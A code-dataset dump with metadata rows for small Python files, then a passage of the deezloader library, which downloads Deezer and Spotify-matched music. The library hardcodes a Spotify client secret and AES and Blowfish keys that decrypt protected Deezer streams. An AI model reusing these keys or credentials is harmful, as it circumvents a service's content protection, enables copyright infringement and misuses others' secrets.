hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3f5776b8e728f6db15ee9f9866b6badb28d53ddf
| 206
|
py
|
Python
|
src/types/array_item.py
|
lucas7788/ontology-python-vm
|
22988c6826d6c8546965016cd6f8cdbc5ce3fa13
|
[
"MIT"
] | null | null | null |
src/types/array_item.py
|
lucas7788/ontology-python-vm
|
22988c6826d6c8546965016cd6f8cdbc5ce3fa13
|
[
"MIT"
] | null | null | null |
src/types/array_item.py
|
lucas7788/ontology-python-vm
|
22988c6826d6c8546965016cd6f8cdbc5ce3fa13
|
[
"MIT"
] | 1
|
2018-10-08T05:15:01.000Z
|
2018-10-08T05:15:01.000Z
|
from src.types.stack_items import StackItems
class ArrayItem(StackItems):
def __init__(self, items: list()):
self.stack_items = items
def get_array(self):
return self.stack_items
| 20.6
| 44
| 0.699029
| 27
| 206
| 5.037037
| 0.592593
| 0.220588
| 0.205882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.213592
| 206
| 9
| 45
| 22.888889
| 0.839506
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.166667
| 0.166667
| 0.833333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
58c0d0b4ee338e05a192ee0532fae170813097ca
| 118
|
py
|
Python
|
fitCurves/__init__.py
|
Tahlor/fitCurves
|
e21b61e9f6cc828bf08f43eb7db4cc5c1ca82aac
|
[
"MIT"
] | null | null | null |
fitCurves/__init__.py
|
Tahlor/fitCurves
|
e21b61e9f6cc828bf08f43eb7db4cc5c1ca82aac
|
[
"MIT"
] | null | null | null |
fitCurves/__init__.py
|
Tahlor/fitCurves
|
e21b61e9f6cc828bf08f43eb7db4cc5c1ca82aac
|
[
"MIT"
] | null | null | null |
from fitCurves import bezier
from fitCurves import main
from fitCurves.main import *
from fitCurves.bezier import *
| 19.666667
| 30
| 0.813559
| 16
| 118
| 6
| 0.3125
| 0.541667
| 0.395833
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152542
| 118
| 5
| 31
| 23.6
| 0.96
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4544202e605cc8794b0aa6b2fbedfc149d9273c2
| 182
|
py
|
Python
|
tests/test_main.py
|
hexatester/dapodik
|
d89c0fb899c89e866527f6b7b57f741abd6444ea
|
[
"MIT"
] | 4
|
2021-02-01T15:19:35.000Z
|
2022-01-26T02:47:21.000Z
|
tests/test_main.py
|
hexatester/dapodik
|
d89c0fb899c89e866527f6b7b57f741abd6444ea
|
[
"MIT"
] | 3
|
2020-01-08T17:07:15.000Z
|
2020-01-08T18:05:12.000Z
|
tests/test_main.py
|
hexatester/dapodik
|
d89c0fb899c89e866527f6b7b57f741abd6444ea
|
[
"MIT"
] | 2
|
2021-08-04T13:48:08.000Z
|
2021-12-25T02:36:49.000Z
|
from dapodik.__main__ import main
from dapodik.main import main as main_main
def test_main():
assert callable(main)
assert callable(main_main)
assert main is main_main
| 20.222222
| 42
| 0.763736
| 28
| 182
| 4.678571
| 0.357143
| 0.183206
| 0.229008
| 0.320611
| 0.381679
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.186813
| 182
| 8
| 43
| 22.75
| 0.885135
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.166667
| true
| 0
| 0.333333
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
e157b2855836c9b1212bcdedfd007c86666a8bfd
| 37,101
|
py
|
Python
|
deezloader/__init__.py
|
Utonia/deezloader
|
922360fe8010b275e9e312481a706be3858729de
|
[
"Apache-2.0"
] | 4
|
2021-06-05T23:20:13.000Z
|
2021-12-29T21:56:00.000Z
|
deezloader/__init__.py
|
phantom2152/deezloader
|
922360fe8010b275e9e312481a706be3858729de
|
[
"Apache-2.0"
] | null | null | null |
deezloader/__init__.py
|
phantom2152/deezloader
|
922360fe8010b275e9e312481a706be3858729de
|
[
"Apache-2.0"
] | 6
|
2021-05-17T13:26:29.000Z
|
2022-01-19T19:43:57.000Z
|
#!/usr/bin/python3
import os
import json
import mutagen
import spotipy
import requests
from tqdm import tqdm
from Crypto.Hash import MD5
from bs4 import BeautifulSoup
import spotipy.oauth2 as oauth2
from mutagen.id3 import ID3, APIC
from mutagen.easyid3 import EasyID3
from binascii import a2b_hex, b2a_hex
from Crypto.Cipher import AES, Blowfish
req = requests.Session()
localdir = os.getcwd()
def generate_token():
credentials = oauth2.SpotifyClientCredentials(client_id="4fe3fecfe5334023a1472516cc99d805", client_secret="0f02b7c483c04257984695007a4a8d5c")
token = credentials.get_access_token()
return token
token = generate_token()
spo = spotipy.Spotify(auth=token)
header = {
"Accept-Language": "en-US,en;q=0.5"
}
params = {
"api_version": "1.0",
"api_token": "null",
"input": "3",
"method": "deezer.getUserData"
}
class TrackNotFound(Exception):
def __init__(self, message):
super().__init__(message)
class AlbumNotFound(Exception):
def __init__(self, message):
super().__init__(message)
class InvalidLink(Exception):
def __init__(self, message):
super().__init__(message)
class BadCredentials(Exception):
def __init__(self, message):
super().__init__(message)
class QuotaExceeded(Exception):
def __init__(self, message):
super().__init__(message)
class Login:
def __init__(self, mail, password):
check = json.loads(req.post("http://www.deezer.com/ajax/gw-light.php", params).text)['results']['checkFormLogin']
post_data = {
"type": "login",
"mail": mail,
"password": password,
"checkFormLogin": check
}
sign = req.post("https://www.deezer.com/ajax/action.php", post_data).text
if "success" in sign:
print("Success, you are in")
else:
raise BadCredentials("Invalid password or username")
def download(self, track, location):
song = {}
ids = track.split("/")[-1]
name = ids + ".mp3"
def login():
try:
token = json.loads(req.post("http://www.deezer.com/ajax/gw-light.php", params).text)['results']['checkForm']
except:
token = json.loads(req.post("http://www.deezer.com/ajax/gw-light.php", params).text)['results']['checkForm']
data = {
"api_version": "1.0",
"input": "3",
"api_token": token,
"method": "song.getData"
}
param = json.dumps({"sng_id": ids})
try:
return json.loads(req.post("http://www.deezer.com/ajax/gw-light.php", param, params=data).text)
except:
return json.loads(req.post("http://www.deezer.com/ajax/gw-light.php", param, params=data).text)
def md5hex(data):
h = MD5.new()
h.update(data)
return b2a_hex(h.digest())
def genurl():
data = b"\xa4".join(a.encode() for a in [song['md5'], "1", str(ids), str(song['media_version'])])
data = b"\xa4".join([md5hex(data), data])+ b"\xa4"
if len(data) % 16:
data += b"\x00" * (16 - len(data) % 16)
c = AES.new("jo6aey6haid2Teih", AES.MODE_ECB)
c = b2a_hex(c.encrypt(data)).decode()
return "https://e-cdns-proxy-8.dzcdn.net/mobile/1/" + c
def calcbfkey(songid):
h = md5hex(b"%d" % int(songid))
key = b"g4el58wc0zvf9na1"
return "".join(chr(h[i] ^ h[i + 16] ^ key[i]) for i in range(16))
def blowfishDecrypt(data, key):
c = Blowfish.new(key, Blowfish.MODE_CBC, a2b_hex("0001020304050607"))
return c.decrypt(data)
def decryptfile(fh, key, fo):
i = 0
for data in fh:
if not data:
break
if (i % 3) == 0 and len(data) == 2048:
data = blowfishDecrypt(data, key)
fo.write(data)
i += 1
infos = login()
song['md5'] = infos['results']['MD5_ORIGIN']
song['media_version'] = infos['results']['MEDIA_VERSION']
try:
fh = requests.get(genurl())
except:
fh = requests.get(genurl())
if len(fh.content) == 0:
raise TrackNotFound("")
open(location + name, "wb").write(fh.content)
fo = open(location + name, "wb")
decryptfile(fh.iter_content(2048), calcbfkey(ids), fo)
def download_trackdee(self, URL, output=localdir + "/Songs/", check=True):
if output == localdir + "/Songs":
if not os.path.isdir("Songs"):
os.makedirs("Songs")
array = []
music = []
artist = []
album = []
tracknum = []
discnum = []
year = []
genre = []
ar_album = []
if "?" in URL:
URL,a = URL.split("?")
URL = "http://www.deezer.com/track/" + URL.split("/")[-1]
try:
url = json.loads(requests.get("http://api.deezer.com/track/" + URL.split("/")[-1]).text)
except:
url = json.loads(requests.get("http://api.deezer.com/track/" + URL.split("/")[-1]).text)
try:
if url['error']['message'] == "Quota limit exceeded":
raise QuotaExceeded("Too much requests limit yourself")
except KeyError:
None
try:
if url['error']['message'] == "no data" or url['error']['message'] == "Invalid query":
raise InvalidLink("Invalid link ;)")
except KeyError:
None
try:
url1 = json.loads(requests.get("http://api.deezer.com/album/" + str(url['album']['id']), headers=header).text)
except:
url1 = json.loads(requests.get("http://api.deezer.com/album/" + str(url['album']['id']), headers=header).text)
try:
if url1['error']['message'] == "Quota limit exceeded":
raise QuotaExceeded("Too much requests limit yourself")
except KeyError:
None
try:
image = url['album']['cover_xl'].replace("1000", "1200")
except:
try:
image = requests.get(URL).text
except:
image = requests.get(URL).text
image = BeautifulSoup(image, "html.parser").find("img", class_="img_main").get("src").replace("120", "1200")
music.append(url['title'])
for a in url['contributors']:
array.append(a['name'])
if len(array) > 1:
for a in array:
for b in range(len(array)):
try:
if a in array[b] and a != array[b]:
del array[b]
except IndexError:
break
artist.append(", ".join(array))
album.append(url['album']['title'])
tracknum.append(url['track_position'])
discnum.append(url['disk_number'])
year.append(url['album']['release_date'])
song = music[0] + " - " + artist[0]
try:
if url1['error']['message'] == "no data":
raise TrackNotFound("Track not found: " + song)
except KeyError:
None
try:
for a in url1['genres']['data']:
genre.append(a['name'])
except KeyError:
None
for a in url1['contributors']:
if a['role'] == "Main":
ar_album.append(a['name'])
dir = str(output) + "/" + artist[0].replace("/", "") + "/"
try:
if not os.path.isdir(dir):
os.makedirs(dir)
except:
None
name = artist[0].replace("/", "") + " " + music[0].replace("/", "") + ".mp3"
if os.path.isfile(dir + name):
if check == False:
return dir + name
ans = input("Song already exist do you want to redownload it?(y or n):")
if not ans == "y":
return
print("\nDownloading:" + song)
try:
self.download(URL, dir)
except TrackNotFound:
try:
url = json.loads(requests.get("https://api.deezer.com/search/track/?q=" + music[0].replace("#", "") + " + " + artist[0].replace("#", "")).text)
except:
url = json.loads(requests.get("https://api.deezer.com/search/track/?q=" + music[0].replace("#", "") + " + " + artist[0].replace("#", "")).text)
try:
if url['error']['message'] == "Quota limit exceeded":
raise QuotaExceeded("Too much requests limit yourself")
except KeyError:
None
try:
for a in range(url['total'] + 1):
if url['data'][a]['title'] == music[0] or url['data'][a]['title_short'] in music[0]:
URL = url['data'][a]['link']
break
except IndexError:
try:
try:
url = json.loads(requests.get("https://api.deezer.com/search/track/?q=" + music[0].replace("#", "").split(" ")[0] + " + " + artist[0].replace("#", "")).text)
except:
url = json.loads(requests.get("https://api.deezer.com/search/track/?q=" + music[0].replace("#", "").split(" ")[0] + " + " + artist[0].replace("#", "")).text)
try:
if url['error']['message'] == "Quota limit exceeded":
raise QuotaExceeded("Too much requests limit yourself")
except KeyError:
None
for a in range(url['total'] + 1):
if music[0].split(" ")[0] in url['data'][a]['title']:
URL = url['data'][a]['link']
break
except IndexError:
raise TrackNotFound("Track not found: " + song)
self.download(URL, dir)
try:
os.rename(dir + URL.split("/")[-1] + ".mp3" , dir + name)
except FileNotFoundError:
None
try:
image = requests.get(image).content
except:
image = requests.get(image).content
try:
tag = EasyID3(dir + name)
tag.delete()
except mutagen.id3.ID3NoHeaderError:
tag = mutagen.File(dir + name, easy=True)
tag.add_tags()
except:
return dir + name
tag['artist'] = artist[0]
tag['title'] = music[0]
tag['date'] = year[0]
tag['album'] = album[0]
tag['tracknumber'] = str(tracknum[0])
tag['discnumber'] = str(discnum[0])
tag['genre'] = " & ".join(genre)
tag['albumartist'] = ", ".join(ar_album)
tag.save(v2_version=3)
audio = ID3(dir + name)
audio['APIC'] = APIC(encoding=3, mime='image/jpeg', type=3, desc=u'Cover', data=image)
audio.save()
return dir + name
def download_albumdee(self, URL, output=localdir + "/Songs/", check=True):
if output == localdir + "/Songs":
if not os.path.isdir("Songs"):
os.makedirs("Songs")
array = []
music = []
artist = []
album = []
tracknum = []
discnum = []
year = []
genre = []
ar_album = []
urls = []
names = []
if "?" in URL:
URL,a = URL.split("?")
URL = "http://www.deezer.com/album/" + URL.split("/")[-1]
try:
url = json.loads(requests.get("http://api.deezer.com/album/" + URL.split("/")[-1], headers=header).text)
except:
url = json.loads(requests.get("http://api.deezer.com/album/" + URL.split("/")[-1], headers=header).text)
try:
if url['error']['message'] == "Quota limit exceeded":
raise QuotaExceeded("Too much requests limit yourself")
except KeyError:
None
try:
if url['error']['message'] == "no data" or url['error']['message'] == "Invalid query":
raise InvalidLink("Invalid link ;)")
except KeyError:
None
try:
image = url['cover_xl'].replace("1000", "1200")
except:
try:
image = requests.get(URL).text
except:
image = requests.get(URL).text
image = BeautifulSoup(image, "html.parser").find("img", class_="img_main").get("src").replace("200", "1200")
for a in url['tracks']['data']:
music.append(a['title'])
urls.append(a['link'])
for a in url['tracks']['data']:
del array[:]
try:
ur = json.loads(requests.get("https://api.deezer.com/track/" + str(a['id'])).text)
except:
ur = json.loads(requests.get("https://api.deezer.com/track/" + str(a['id'])).text)
try:
if ur['error']['message'] == "Quota limit exceeded":
raise QuotaExceeded("Too much requests limit yourself")
except KeyError:
None
tracknum.append(ur['track_position'])
discnum.append(ur['disk_number'])
for a in ur['contributors']:
array.append(a['name'])
if len(array) > 1:
for a in array:
for b in range(len(array)):
try:
if a in array[b] and a != array[b]:
del array[b]
except IndexError:
break
artist.append(", ".join(array))
album.append(url['title'])
year.append(url['release_date'])
try:
for a in url['genres']['data']:
genre.append(a['name'])
except KeyError:
None
for a in url['contributors']:
if a['role'] == "Main":
ar_album.append(a['name'])
dir = str(output) + "/" + album[0].replace("/", "") + "/"
try:
if not os.path.isdir(dir):
os.makedirs(dir)
except:
None
try:
image = requests.get(image).content
except:
image = requests.get(image).content
for a in tqdm(range(len(urls))):
name = artist[a].replace("/", "") + " " + music[a].replace("/", "") + ".mp3"
names.append(dir + name)
if os.path.isfile(dir + name):
if check == False:
continue
print(dir + name)
ans = input("Song already exist do you want to redownload it?(y or n):")
if not ans == "y":
return
try:
self.download(urls[a], dir)
except TrackNotFound:
try:
url = json.loads(requests.get("https://api.deezer.com/search/track/?q=" + music[a].replace("#", "") + " + " + artist[a].replace("#", "")).text)
except:
url = json.loads(requests.get("https://api.deezer.com/search/track/?q=" + music[a].replace("#", "") + " + " + artist[a].replace("#", "")).text)
try:
if url['error']['message'] == "Quota limit exceeded":
raise QuotaExceeded("Too much requests limit yourself")
except KeyError:
None
try:
for b in range(url['total'] + 1):
if url['data'][b]['title'] == music[a] or url['data'][b]['title_short'] in music[a]:
URL = url['data'][b]['link']
break
except IndexError:
try:
try:
url = json.loads(requests.get("https://api.deezer.com/search/track/?q=" + music[a].replace("#", "").split(" ")[0] + " + " + artist[a].replace("#", "")).text)
except:
url = json.loads(requests.get("https://api.deezer.com/search/track/?q=" + music[a].replace("#", "").split(" ")[0] + " + " + artist[a].replace("#", "")).text)
try:
if url['error']['message'] == "Quota limit exceeded":
raise QuotaExceeded("Too much requests limit yourself")
except KeyError:
None
for b in range(url['total'] + 1):
if music[a].split(" ")[0] in url['data'][b]['title']:
URL = url['data'][b]['link']
break
except IndexError:
print("\nTrack not found: " + music[a] + " - " + artist[a])
continue
self.download(URL, dir)
urls[a] = URL
try:
os.rename(dir + urls[a].split("/")[-1] + ".mp3", dir + name)
except FileNotFoundError:
None
try:
tag = EasyID3(dir + name)
tag.delete()
except mutagen.id3.ID3NoHeaderError:
tag = mutagen.File(dir + name, easy=True)
tag.add_tags()
except:
continue
tag['artist'] = artist[a]
tag['title'] = music[a]
tag['date'] = year[0]
tag['album'] = album[0]
tag['tracknumber'] = str(tracknum[a])
tag['discnumber'] = str(discnum[a])
tag['genre'] = " & ".join(genre)
tag['albumartist'] = ", ".join(ar_album)
tag.save(v2_version=3)
audio = ID3(dir + name)
audio['APIC'] = APIC(encoding=3, mime='image/jpeg', type=3, desc=u'Cover', data=image)
audio.save()
return names
def download_playlistdee(self, URL, output=localdir + "/Songs/", check=True):
array = []
if "?" in URL:
URL,a = URL.split("?")
try:
url = json.loads(requests.get("https://api.deezer.com/playlist/" + URL.split("/")[-1] + "/tracks").text)
except:
url = json.loads(requests.get("https://api.deezer.com/playlist/" + URL.split("/")[-1] + "/tracks").text)
try:
if url['error']['message'] == "Quota limit exceeded":
raise QuotaExceeded("Too much requests limit yourself")
except KeyError:
None
try:
if url['error']['message'] == "no data" or url['error']['message'] == "Invalid query":
raise InvalidLink("Invalid link ;)")
except KeyError:
None
for a in url['data']:
array.append(self.download_trackdee(a['link'], output, check))
return array
def download_trackspo(self, URL, output=localdir + "/Songs/", check=True, playlist=False):
global spo
if output == localdir + "/Songs":
if not os.path.isdir("Songs"):
os.makedirs("Songs")
array = []
music = []
artist = []
album = []
tracknum = []
discnum = []
year = []
genre = []
ar_album = []
if not len(URL) == 53:
URL,a = URL.split("?")
if len(URL) != 53:
raise InvalidLink("Invalid link ;)")
try:
url = spo.track(URL)
except:
token = generate_token()
spo = spotipy.Spotify(auth=token)
url = spo.track(URL)
music.append(url['name'])
for a in range(20):
try:
array.append(url['artists'][a]['name'])
except IndexError:
artist.append(", ".join(array))
del array[:]
break
album.append(url['album']['name'])
image = url['album']['images'][0]['url']
tracknum.append(url['track_number'])
discnum.append(url['disc_number'])
year.append(url['album']['release_date'])
for a in url['album']['artists']:
ar_album.append(a['name'])
try:
url = json.loads(requests.get("https://api.deezer.com/search/track/?q=" + music[0].replace("#", "") + " + " + artist[0].replace("#", "")).text)
except:
url = json.loads(requests.get("https://api.deezer.com/search/track/?q=" + music[0].replace("#", "") + " + " + artist[0].replace("#", "")).text)
try:
if url['error']['message'] == "Quota limit exceeded":
raise QuotaExceeded("Too much requests limit yourself")
except KeyError:
None
song = music[0] + " - " + artist[0]
if playlist == False:
try:
for a in range(url['total'] + 1):
if (url['data'][a]['title'] == music[0] or url['data'][a]['title_short'] in music[0]) and url['data'][a]['album']['title'] == album[0]:
URL = url['data'][a]['link']
break
except IndexError:
try:
try:
url = json.loads(requests.get("https://api.deezer.com/search/track/?q=" + music[0].replace("#", "").split(" ")[0] + " + " + artist[0].replace("#", "")).text)
except:
url = json.loads(requests.get("https://api.deezer.com/search/track/?q=" + music[0].replace("#", "").split(" ")[0] + " + " + artist[0].replace("#", "")).text)
try:
if url['error']['message'] == "Quota limit exceeded":
raise QuotaExceeded("Too much requests limit yourself")
except KeyError:
None
for a in range(url['total'] + 1):
if music[0].split(" ")[0] in url['data'][a]['title']:
URL = url['data'][a]['link']
break
except IndexError:
raise TrackNotFound("Track not found: " + song)
elif playlist == True:
try:
for a in range(url['total'] + 1):
if (url['data'][a]['title'] == music[0] or url['data'][a]['title_short'] in music[0]) and url['data'][a]['album']['title'] == album[0]:
URL = url['data'][a]['link']
break
except IndexError:
try:
url = json.loads(requests.get("https://api.deezer.com/search/track/?q=" + music[0].replace("#", "").split(" ")[0] + " + " + artist[0].replace("#", "")).text)
except:
url = json.loads(requests.get("https://api.deezer.com/search/track/?q=" + music[0].replace("#", "").split(" ")[0] + " + " + artist[0].replace("#", "")).text)
try:
if url['error']['message'] == "Quota limit exceeded":
raise QuotaExceeded("Too much requests limit yourself")
except KeyError:
None
for a in range(url['total'] + 1):
if music[0].split(" ")[0] in url['data'][a]['title']:
URL = url['data'][a]['link']
break
song = music[0] + " - " + artist[0]
try:
url = json.loads(requests.get("http://api.deezer.com/track/" + URL.split("/")[-1]).text)
except:
url = json.loads(requests.get("http://api.deezer.com/track/" + URL.split("/")[-1]).text)
try:
if url['error']['message'] == "Quota limit exceeded":
raise QuotaExceeded("Too much requests limit yourself")
except KeyError:
None
try:
url1 = json.loads(requests.get("http://api.deezer.com/album/" + str(url['album']['id']), headers=header).text)
except:
url1 = json.loads(requests.get("http://api.deezer.com/album/" + str(url['album']['id']), headers=header).text)
try:
if url1['error']['message'] == "Quota limit exceeded":
raise QuotaExceeded("Too much requests limit yourself")
except KeyError:
None
try:
for a in url1['genres']['data']:
genre.append(a['name'])
except KeyError:
None
dir = str(output) + "/" + artist[0].replace("/", "") + "/"
try:
if not os.path.isdir(dir):
os.makedirs(dir)
except:
None
name = artist[0].replace("/", "") + " " + music[0].replace("/", "") + ".mp3"
if os.path.isfile(dir + name):
if check == False:
return dir + name
ans = input("Song already exist do you want to redownload it?(y or n):")
if not ans == "y":
return
print("\nDownloading:" + song)
self.download(URL, dir)
try:
os.rename(dir + URL.split("/")[-1] + ".mp3" , dir + name)
except FileNotFoundError:
None
try:
image = requests.get(image).content
except:
image = requests.get(image).content
try:
tag = EasyID3(dir + name)
tag.delete()
except mutagen.id3.ID3NoHeaderError:
tag = mutagen.File(dir + name, easy=True)
tag.add_tags()
except:
return dir + name
tag['artist'] = artist[0]
tag['title'] = music[0]
tag['date'] = year[0]
tag['album'] = album[0]
tag['tracknumber'] = str(tracknum[0])
tag['discnumber'] = str(discnum[0])
tag['genre'] = " & ".join(genre)
tag['albumartist'] = ", ".join(ar_album)
tag.save(v2_version=3)
audio = ID3(dir + name)
audio['APIC'] = APIC(encoding=3, mime='image/jpeg', type=3, desc=u'Cover', data=image)
audio.save()
return dir + name
def download_albumspo(self, URL, output=localdir + "/Songs/", check=True):
global spo
if output == localdir + "/Songs":
if not os.path.isdir("Songs"):
os.makedirs("Songs")
array = []
music = []
artist = []
album = []
tracknum = []
discnum = []
year = []
genre = []
ar_album = []
urls = []
names = []
if not len(URL) == 53:
URL,a = URL.split("?")
if len(URL) != 53:
raise InvalidLink("Invalid link ;)")
try:
tracks = spo.album(URL)
except:
token = generate_token()
spo = spotipy.Spotify(auth=token)
tracks = spo.album(URL)
album.append(tracks['name'])
for a in tracks['artists']:
ar_album.append(a['name'])
for track in tracks['tracks']['items']:
music.append(track['name'])
tracknum.append(track['track_number'])
discnum.append(track['disc_number'])
for artists in tracks['tracks']['items']:
for a in range(20):
try:
array.append(artists['artists'][a]['name'])
except IndexError:
artist.append(", ".join(array))
del array[:]
break
year.append(tracks['release_date'])
image = tracks['images'][0]['url']
for a in range(tracks['total_tracks'] // 50):
try:
tracks = spo.next(tracks['tracks'])
except:
token = generate_token()
spo = spotipy.Spotify(auth=token)
tracks = spo.next(tracks)['items']
for track in tracks['items']:
music.append(track['name'])
tracknum.append(track['track_number'])
discnum.append(track['disc_number'])
for artists in tracks['items']:
for a in range(20):
try:
array.append(artists['artists'][a]['name'])
except IndexError:
artist.append(", ".join(array))
del array[:]
break
artis = tracks['artists'][0]['name']
dir = str(output) + "/" + album[0].replace("/", "") + "/"
try:
if not os.path.isdir(dir):
os.makedirs(dir)
except:
None
try:
url = json.loads(requests.get('https://api.deezer.com/search/?q=artist:"' + artis.replace("#", "") + '" album:"' + album[0].replace("#", "") + '"').text)
except:
url = json.loads(requests.get('https://api.deezer.com/search/?q=artist:"' + artis.replace("#", "") + '" album:"' + album[0].replace("#", "") + '"').text)
try:
if url['error']['message'] == "Quota limit exceeded":
raise QuotaExceeded("Too much requests limit yourself")
except KeyError:
None
try:
for a in range(url['total'] + 1):
if url['data'][a]['album']['title'] == album[0]:
URL = str(url['data'][a]['album']['id'])
break
except IndexError:
raise AlbumNotFound("Album not found: " + album[0])
try:
url = json.loads(requests.get("https://api.deezer.com/album/" + URL, headers=header).text)
except:
url = json.loads(requests.get("https://api.deezer.com/album/" + URL, headers=header).text)
try:
if url['error']['message'] == "Quota limit exceeded":
raise QuotaExceeded("Too much requests limit yourself")
except KeyError:
None
for a in url['tracks']['data']:
urls.append(a['link'])
try:
for a in url['genres']['data']:
genre.append(a['name'])
except KeyError:
None
try:
image = requests.get(image).content
except:
image = requests.get(image).content
if len(urls) < len(music):
idk = len(urls)
elif len(urls) > len(music):
idk = len(music)
else:
idk = len(urls)
for a in tqdm(range(idk)):
name = artist[a].replace("/", "") + " " + music[a].replace("/", "") + ".mp3"
names.append(dir + name)
if os.path.isfile(dir + name):
